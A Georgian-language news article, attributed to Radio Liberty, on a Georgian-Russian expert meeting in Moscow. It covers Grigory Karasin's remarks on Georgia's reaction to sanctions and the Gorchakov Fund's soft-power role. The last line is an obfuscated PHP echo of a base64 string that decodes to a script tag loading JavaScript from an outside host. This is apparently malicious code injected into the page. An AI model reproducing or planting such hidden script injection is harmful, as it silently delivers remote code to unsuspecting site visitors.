celsiusi
ავერსი შნაიდერი
რუსეთის საგარეო საქმეთა სამინისტროს ცნობით, 24 მარტს მოსკოვში გაიხსნა ქართულ-რუსული საექსპერტო შეხვედრა. მასში მონაწილეობა მიიღო დაახლოებით 40-მა ექსპერტმა, პოლიტოლოგმა და მეცნიერმა ორივე მხრიდან, გარდა ამისა, მონაწილეობდნენ ქართული დიასპორის წარმომადგენლები.
 
ღონისძიების ორგანიზატორი იყო „გორჩაკოვის ფონდი" და პრიმაკოვის სახელობის ქართულ-რუსული საზოგადოებრივი ცენტრი.
 
მონაწილეებს შეხვდა რუსეთის ფედერაციის საბჭოს საერთაშორისო საქმეთა კომიტეტის ხელმძღვანელი გრიგორი კარასინი. დეპუტატმა დაახასიათა „უკრაინაში კრიზისის" გამო დასავლეთის მიერ რუსეთის წინააღმდეგ მიღებული სანქციების მიმართ საქართველოს რეაქცია. კარასინმა ხაზგასმით აღნიშნა, რომ რუსეთს ეს ფაქტი „შეუმჩნევეელი არ დარჩება".
 
"პოსტსაბჭოთა სივრცეს ჩვენ ვუყურებთ, როგორც ტრადიციულ მეგობრებს, არსებული ურთიერთობა ხასიათდება ურთიერთდახმარებით. რუსეთი მხარს უჭერს ყველა საკითხის მშვიდად მშვიდ მიდგომას.
 
სანქცირების რეჟიმი „წვრთნის" რუსეთის სახელმწიფოს. ვინც ჩვენ გვეპყრობა სამართლიანად და ღიად გველაპარაკება, ის მეგობრად დარჩება", - განაცხადა კარასინმა.
 
მან რუსეთ-საქართველოს შესახებ თქვა, რომ „ჩვენს ურთიერთობებს აქვს ნათელი მომავალი".
 
"გორჩაკოვის ფონდი" 2010 წელს, რუსეთის მაშინდელი პრეზიდენტის, დმიტრი მედვედევის ბრძანებით შექმნა საგარეო საქმეთა სამინისტრომ და რუსეთის "რბილი ძალის" გავრცელების ერთ-ერთი ინსტრუმენტია.
 
 
წყარო:რადიო თავისუფლება
1597
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");